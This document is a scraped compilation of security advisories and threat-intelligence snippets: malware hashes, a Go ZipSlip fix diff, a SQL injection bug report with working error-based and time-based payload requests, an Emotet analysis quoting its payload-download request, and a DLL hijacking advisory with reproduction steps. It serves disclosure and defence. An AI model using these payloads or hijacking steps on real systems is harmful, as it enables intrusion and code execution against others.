**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

Threat Source newsletter (March 16, 2023) — A deep dive into Talos' work in Ukraine

Proof of concept code for a critical Microsoft Outlook vulnerability for Windows that allows hackers to remotely steal hashed passwords by simply receiving an email.

Microsoft Outlook CVE-2023-23397 Proof Of Concept

go-used-util has commonly used utility functions for Go. Versions prior to 0.0.34 have a ZipSlip issue when using fsutil package to unzip files. When users use `zip.Unzip` to unzip zip files from a malicious attacker, they may be vulnerable to path traversal. The issue has been fixed in version 0.0.34. There are no known workarounds.

@@ -55,7 +55,7 @@ func ReadLinesV2(path string) (\[\]string, int, error) { } }  
// ListDir lists all the file or dir names in the specified directory. // ListDir lists all the file or directory names in the specified directory. // Note that ListDir don't traverse recursively. func ListDir(dirname string) (\[\]string, error) { infos, err := ioutil.ReadDir(dirname) @@ -69,12 +69,12 @@ func ListDir(dirname string) (\[\]string, error) { return names, nil }  
// IsPathExist checks whether a file/dir exists. // IsExist checks whether a file/dir exists. // Use os.Stat to get the info of the target file or dir to check whether exists. // If os.Stat returns nil err, the target exists. // If os.Stat returns a os.ErrNotExist err, the target does not exist. // If the error returned is another type, the target is uncertain whether exists. func IsPathExist(path string) (bool, error) { func IsExist(path string) (bool, error) { \_, err := os.Stat(path) if err \== nil { return true, nil @@ -123,17 +123,19 @@ func IsFileE(path string) (bool, error) { return false, err }  
// IsSymlink checks a file whether is a symbolic link. // IsSymlink checks a file whether is a symbolic link on Linux. // Note that this doesn't work for the shortcut file on windows. // If you want to check a file whether is a shortcut file on Windows please use IsShortcut function. func IsSymlink(path string) bool { if info, err := os.Lstat(path); err \== nil && info.Mode()&os.ModeSymlink != 0 { return true } return false }  
// IsSymlinkE checks a file whether is a symbolic link. // IsSymlinkE checks a file whether is a symbolic link on Linux. // Note that this doesn't work for the shortcut file on windows. // If you want to check a file whether is a shortcut file on Windows please use IsShortcut function. func IsSymlinkE(path string) (bool, error) { info, err := os.Lstat(path) if err \== nil && info.Mode()&os.ModeSymlink != 0 { @@ -142,27 +144,37 @@ func IsSymlinkE(path string) (bool, error) { return false, err }  
// IsShortcut checks a file whether is a shortcut on Windows. func IsShortcut(path string) bool { ext := filepath.Ext(path) if ext \== ".lnk" { return true } return false }  
// RemoveFile removes the named file or empty directory. // https://gist.github.com/novalagung/13c5c8f4d30e0c4bff27 // If there is an error, it will be of type \*PathError. func RemoveFile(path string) error { err := os.Remove(path) return err return os.Remove(path) }  
// Create creates or truncates the target file specified by path. // If the parent directory does not exist, it will be created with mode os.ModePerm.is cr truncated. // If the parent directory does not exist, it will be created with mode os.ModePerm. // If the file does not exist, it is created with mode 0666. // If successful, methods on the returned File can be used for I/O; the associated file descriptor has mode O\_RDWR. func Create(filePath string) (\*os.File, error) { if exist, err := IsPathExist(filePath); err != nil { // If successful, methods on the returned file can be used for I/O; the associated file descriptor has mode O\_RDWR. func Create(path string) (\*os.File, error) { exist, err := IsExist(path) if err != nil { return nil, err } else if exist { return os.Create(filePath) } if err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil { if exist { return os.Create(path) } if err := os.MkdirAll(filepath.Dir(path), os.ModePerm); err != nil { return nil, err } return os.Create(filePath) return os.Create(path) }  
// CreateFile creates a file specified by path. @@ -181,15 +193,16 @@ func FileToBytes(path string) \[\]byte { return byteStream }  
// BytesToFile writes data to a file. If the file does not exist it will be created with permission mode 0644. func BytesToFile(filePath string, data \[\]byte) error { exist, \_ := IsPathExist(filePath) // BytesToFile writes data to a file. // If the file does not exist it will be created with permission mode 0644. func BytesToFile(path string, data \[\]byte) error { exist, \_ := IsExist(path) if !exist { if err := CreateFile(filePath); err != nil { if err := CreateFile(path); err != nil { return err } } return ioutil.WriteFile(filePath, data, 0644) return ioutil.WriteFile(path, data, 0644) }  
// GetDirAllEntryPaths gets all the file or dir paths in the specified directory recursively. @@ -260,3 +273,13 @@ func GetDirAllEntryPathsFollowSymlink(dirname string, incl bool) (\[\]string, erro } return paths, nil }  
// ClearFile clears a file content. func ClearFile(path string) error { f, err := os.OpenFile(path, os.O\_WRONLY|os.O\_TRUNC, 0777) if err != nil { return err } defer f.Close() return nil }

CVE-2023-28105: fix zip.Unzip path traversal vulnerability and add some new file util… · dablelv/go-huge-util@0e308b0

School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.

Permalink

Cannot retrieve contributors at this time

**School Registration and Fee System v1.0 has SQL injection**

BUG\_Author:Forsan

Vulnerability File: /bilal final/edit\_user.php

GET parameter 'id' exists SQL injection vulnerability

Payload1: http://localhost/bilal%20final/edit\_user.php?id=3%27

    GET /bilal%20final/edit_user.php?id=3%27 HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

An error occurred in the sql statement

Payload2: http://localhost/bilal%20final/edit\_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b

    GET /bilal%20final/edit_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

The server's response time is 5 seconds

CVE-2023-27041: bug_report/SQLi-1.md at main · forsean/bug_report

Categories: Threat Intelligence
Emotet finally got the memo and added Microsoft OneNote lures.



(Read more...)




The post Emotet adopts Microsoft OneNote attachments appeared first on Malwarebytes Labs.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet's turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\\OneNote\\16.0\\NT\\0\\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn\[.\]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: \*/\*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\\OneNote\\16.0\\NT\\0\\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Emotet adopts Microsoft OneNote attachments

An issue found in UwAmp v.1.1, 1.2, 1.3, 2.0, 2.1, 2.2, 2.2.1, 3.0.0, 3.0.1, 3.0.2 allows a remote attacker to execute arbitrary code via a crafted DLL.

Platform: Windows 10 version 1904

Impact: Arbitrary Code Execution and Privilege Escalation

Product: UwAmp.exe

Version: 3.0.2

Summary:

A malicous user can perform arbitrary code execution and priviledge escalation on victim machine by hijacking DLLs.

DLL Hijacking vulnerability occurs when some DLLs are missing from same directory of vulnerable binary.

Crafted Malicous DLLs are used to replace missing dlls and perform malicious actions

Missing DLL : shfolder.dll

Steps to reproduce:

1\. Use ProcMon to listen on events

2\. ProcMon shows shfolder.dll is missing from current directory

2\. Place malicious DLL naming shfolder.dll to current directory of installer

3\. Now run UwAmp.exe and installer will try to load malicous dll which leads to arbitrary code execution and privilege escalation.

Impact:

1\. Privilege Escalation

2\. Arbitrary Code Execution

Mitigation:

1\. Avoid loading DLLs from current location

Tag

#windows